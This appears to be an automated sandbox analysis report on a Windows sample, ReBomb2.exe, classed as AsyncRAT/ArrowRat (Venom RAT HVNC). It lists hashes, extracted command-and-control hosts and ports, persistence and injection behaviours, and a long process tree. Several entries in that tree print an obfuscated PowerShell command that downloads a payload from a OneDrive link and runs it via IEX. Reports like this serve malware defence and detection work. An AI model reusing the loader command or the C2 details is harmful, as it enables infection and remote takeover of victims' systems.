arrowrat | 80d1631227d5b253b69f1004286c4562e765d54be593ac0b6ad0d34b35275f94

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2024 21:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ReBomb2.exe
Size

8.8MB
MD5

11f3d124b89d4c6a737f993442e15259
SHA1

290b45651633021d3afd4bdedf8f03c2c705cf11
SHA256

80d1631227d5b253b69f1004286c4562e765d54be593ac0b6ad0d34b35275f94
SHA512

43822db6a9dd226579c136e7049012714fb54ca4915fdf4b4ba92e2a72380b1b56de7a9a6cef79e9b62139e36244812955ca4bb2ff8991f03ef96f929d95b4f8
SSDEEP

196608:jnXFXAjanN0pJEFaSWADbBZpY8kqt0W9X41CoOw0bldnC9t:DFrypJEDpnpzkqt0kX41CtBdnC9t

Score

10^/10

arrowrat asyncrat venom clients venomhvnc discovery execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

windows-services.linkpc.net:4449

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
true
install_file
System.exe
install_folder
%AppData%

aes.plain

Extracted

Family

arrowrat

Botnet

VenomHVNC

windows-services.linkpc.net:4448

Mutex

waDQmvKdS.exe

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat
Arrowrat family
arrowrat
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

ClientH.exeClientH.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\sihost\\sihost"	ClientH.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\sihost\\sihost"	ClientH.exe

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023cbf-16.dat	family_asyncrat

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ReBomb2.exeReBomb2.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	ReBomb2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	ReBomb2.exe

Executes dropped EXE 6 IoCs

Processes:

ReBomb2.exeClientH.exevenom.exeReBomb2.exeClientH.exevenom.exe

pid	Process
2184	ReBomb2.exe
1564	ClientH.exe
4980	venom.exe
4056	ReBomb2.exe
3132	ClientH.exe
492	venom.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
6460	powershell.exe
7456	powershell.exe
9704	powershell.exe
7400	powershell.exe
6712	powershell.exe
6860	powershell.exe
7944	powershell.exe
9872	powershell.exe
8196	powershell.exe
3240	powershell.exe
8568	powershell.exe
1400	powershell.exe
9980	powershell.exe
6560	powershell.exe
1008	powershell.exe
3708	powershell.exe
7980	powershell.exe
5024	powershell.exe
8268	powershell.exe
6008	powershell.exe
9504	powershell.exe
10740	powershell.exe
7124	powershell.exe
6952	powershell.exe
6416	powershell.exe
3848	powershell.exe
9140	powershell.exe
3924	powershell.exe
4328	powershell.exe
5528	powershell.exe
5808	powershell.exe
6868	powershell.exe
7192	powershell.exe
2656	powershell.exe
4312	powershell.exe
3296	powershell.exe
1248	powershell.exe
3112	powershell.exe
2444	powershell.exe
7620	powershell.exe
8252	powershell.exe
4720	powershell.exe
5672	powershell.exe
9516	powershell.exe
10720	powershell.exe
2480	powershell.exe
4708	powershell.exe
5896	powershell.exe
3956	powershell.exe
7052	powershell.exe
7876	powershell.exe
7748	powershell.exe
4832	powershell.exe
10080	powershell.exe
496	powershell.exe
3016	powershell.exe
7940	powershell.exe
7992	powershell.exe
1248	powershell.exe
7180	powershell.exe
8976	powershell.exe
6148	powershell.exe
6884	powershell.exe
7592	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

ClientH.exeClientH.exe

description	pid	Process	procid_target
PID 1564 set thread context of 332	1564	ClientH.exe	94
PID 3132 set thread context of 4560	3132	ClientH.exe	96

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
7452	6196	WerFault.exe	293

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

ReBomb2.exeClientH.exeReBomb2.exeWScript.exeClientH.exeReBomb2.exeWScript.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReBomb2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ClientH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReBomb2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ClientH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReBomb2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Delays execution with timeout.exe 3 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid	Process
1748	timeout.exe
5552	timeout.exe
9356	timeout.exe

Modifies registry class 2 IoCs

Processes:

ReBomb2.exeReBomb2.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	ReBomb2.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	ReBomb2.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid	Process
3820	schtasks.exe
6828	schtasks.exe
10864	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

ClientH.exeClientH.exe

pid	Process
3132	ClientH.exe
1564	ClientH.exe
3132	ClientH.exe
3132	ClientH.exe
3132	ClientH.exe
3132	ClientH.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

ClientH.exeClientH.exe

description	pid	Process
Token: SeDebugPrivilege	3132	ClientH.exe
Token: SeDebugPrivilege	1564	ClientH.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

ReBomb2.exeReBomb2.exeClientH.exeClientH.exe

description	pid	Process	procid_target
PID 976 wrote to memory of 2184	976	ReBomb2.exe	83
PID 976 wrote to memory of 2184	976	ReBomb2.exe	83
PID 976 wrote to memory of 2184	976	ReBomb2.exe	83
PID 976 wrote to memory of 1564	976	ReBomb2.exe	84
PID 976 wrote to memory of 1564	976	ReBomb2.exe	84
PID 976 wrote to memory of 1564	976	ReBomb2.exe	84
PID 976 wrote to memory of 4980	976	ReBomb2.exe	85
PID 976 wrote to memory of 4980	976	ReBomb2.exe	85
PID 976 wrote to memory of 1060	976	ReBomb2.exe	86
PID 976 wrote to memory of 1060	976	ReBomb2.exe	86
PID 976 wrote to memory of 1060	976	ReBomb2.exe	86
PID 2184 wrote to memory of 4056	2184	ReBomb2.exe	153
PID 2184 wrote to memory of 4056	2184	ReBomb2.exe	153
PID 2184 wrote to memory of 4056	2184	ReBomb2.exe	153
PID 2184 wrote to memory of 3132	2184	ReBomb2.exe	88
PID 2184 wrote to memory of 3132	2184	ReBomb2.exe	88
PID 2184 wrote to memory of 3132	2184	ReBomb2.exe	88
PID 2184 wrote to memory of 492	2184	ReBomb2.exe	89
PID 2184 wrote to memory of 492	2184	ReBomb2.exe	89
PID 2184 wrote to memory of 3204	2184	ReBomb2.exe	90
PID 2184 wrote to memory of 3204	2184	ReBomb2.exe	90
PID 2184 wrote to memory of 3204	2184	ReBomb2.exe	90
PID 1564 wrote to memory of 2560	1564	ClientH.exe	91
PID 1564 wrote to memory of 2560	1564	ClientH.exe	91
PID 3132 wrote to memory of 3604	3132	ClientH.exe	92
PID 3132 wrote to memory of 3604	3132	ClientH.exe	92
PID 3132 wrote to memory of 4040	3132	ClientH.exe	93
PID 3132 wrote to memory of 4040	3132	ClientH.exe	93
PID 3132 wrote to memory of 4040	3132	ClientH.exe	93
PID 1564 wrote to memory of 332	1564	ClientH.exe	94
PID 1564 wrote to memory of 332	1564	ClientH.exe	94
PID 1564 wrote to memory of 332	1564	ClientH.exe	94
PID 3132 wrote to memory of 4972	3132	ClientH.exe	95
PID 3132 wrote to memory of 4972	3132	ClientH.exe	95
PID 3132 wrote to memory of 4972	3132	ClientH.exe	95
PID 1564 wrote to memory of 332	1564	ClientH.exe	94
PID 1564 wrote to memory of 332	1564	ClientH.exe	94
PID 1564 wrote to memory of 332	1564	ClientH.exe	94
PID 1564 wrote to memory of 332	1564	ClientH.exe	94
PID 1564 wrote to memory of 332	1564	ClientH.exe	94
PID 3132 wrote to memory of 4560	3132	ClientH.exe	96
PID 3132 wrote to memory of 4560	3132	ClientH.exe	96
PID 3132 wrote to memory of 4560	3132	ClientH.exe	96
PID 3132 wrote to memory of 4560	3132	ClientH.exe	96
PID 3132 wrote to memory of 4560	3132	ClientH.exe	96
PID 3132 wrote to memory of 4560	3132	ClientH.exe	96
PID 3132 wrote to memory of 4560	3132	ClientH.exe	96
PID 3132 wrote to memory of 4560	3132	ClientH.exe	96

C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
"C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:976
- C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
  "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
    "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4056
  - - C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
      "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
      4⤵
      PID:4000
    - - C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        5⤵
        
        PID:912
      - C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        6⤵
        
        PID:4212
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        7⤵
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        8⤵
        
        PID:1928
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        9⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        10⤵
        
        PID:3556
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        11⤵
        
        PID:364
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        12⤵
        
        PID:3476
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        13⤵
        
        PID:5428
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        14⤵
        
        PID:6056
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        15⤵
        
        PID:5372
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        16⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        17⤵
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        18⤵
        
        PID:6768
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        19⤵
        
        PID:5148
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        20⤵
        
        PID:6792
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        21⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        22⤵
        
        PID:7952
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        23⤵
        
        PID:6216
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        24⤵
        
        PID:7868
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        25⤵
        
        PID:2688
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        26⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        27⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        28⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        29⤵
        
        PID:4712
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        30⤵
        
        PID:6668
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        31⤵
        
        PID:8664
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        32⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        33⤵
        
        PID:1896
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        34⤵
        
        PID:8740
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        35⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        36⤵
        
        PID:7852
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        37⤵
        
        PID:7408
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        38⤵
        
        PID:8308
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        39⤵
        
        PID:9960
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        40⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        41⤵
        
        PID:6312
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        42⤵
        
        PID:5216
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        43⤵
        
        PID:5992
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        44⤵
        
        PID:6252
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        45⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        46⤵
        
        PID:10948
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        45⤵
        
        PID:4424
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        46⤵
        
        PID:2868
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        46⤵
        
        PID:5812
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        46⤵
        
        PID:5428
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        45⤵
        
        PID:4608
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        45⤵
        
        PID:10556
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        44⤵
        
        PID:648
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        45⤵
        
        PID:3540
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        45⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        44⤵
        
        PID:1840
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        44⤵
        
        PID:1064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10720
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        43⤵
        
        PID:7308
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        44⤵
        
        PID:2228
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        44⤵
        
        PID:9240
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        43⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        43⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        42⤵
        
        PID:7372
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        43⤵
        
        PID:7632
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        43⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        42⤵
        
        PID:6492
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        42⤵
        
        PID:2016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7192
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        41⤵
        
        PID:10228
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        42⤵
        
        PID:6316
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        42⤵
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        41⤵
        
        PID:6488
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        41⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10080
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        40⤵
        
        PID:6044
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        41⤵
        
        PID:9676
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        41⤵
        
        PID:9932
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        41⤵
        
        PID:10128
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        40⤵
        
        PID:6744
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        40⤵
        
        PID:7140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8976
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        39⤵
        
        PID:10124
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        40⤵
        
        PID:8324
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        40⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        39⤵
        
        PID:10168
        
        C:\Windows\SysWOW64\WScript.exe
        
